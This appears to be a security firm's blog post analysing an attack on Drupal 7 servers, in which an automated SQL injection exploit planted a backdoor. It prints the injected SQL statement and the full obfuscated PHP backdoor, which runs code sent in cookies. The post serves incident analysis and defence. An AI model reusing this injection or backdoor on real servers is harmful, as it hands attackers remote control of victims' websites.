Automated exploiting and backdooring of Drupal 7 web servers

Today we were contacted by one of our Belgian partners that they wanted to patch a Drupal 7 server to protect against the latest vulnerability, released this week by Drupal Security.

The file was already patched, without knowledge of the customer and without finding traces in the Drupal management console.

Our partner investigated the access logs and they found strange requests from a Russian IP to this web server. They found this suspicious and contacted us.

Root-analysis, based on mininal log information available, revealed that the Drupal server was attacked and a backdoor was installed.

The criminals used an automated exploit based on proof-of-concept code and they used this to inject malicious PHP in Drupal.

The exploit tries to abuse the SQL Injection to insert data in the route tabel, Acquia has seen these attacks too:

INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`)
VALUES ('mziogj', '', '', 'mziogj', 'file_put_contents','[TROJAN]');

The back-door:

<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();

So sending PHP code in the Cookie will have this executed on the Drupal web server. This PHP can be anything that will be executed on the web server. And is independent of the platform: Windows or Linux.

Several other people confirm this behavior on the Drupal page about the vulnerability:

There are 1 Comments

user picture

To check what files were modified you can use `git status`, otherwise use Hacked module (

Add comment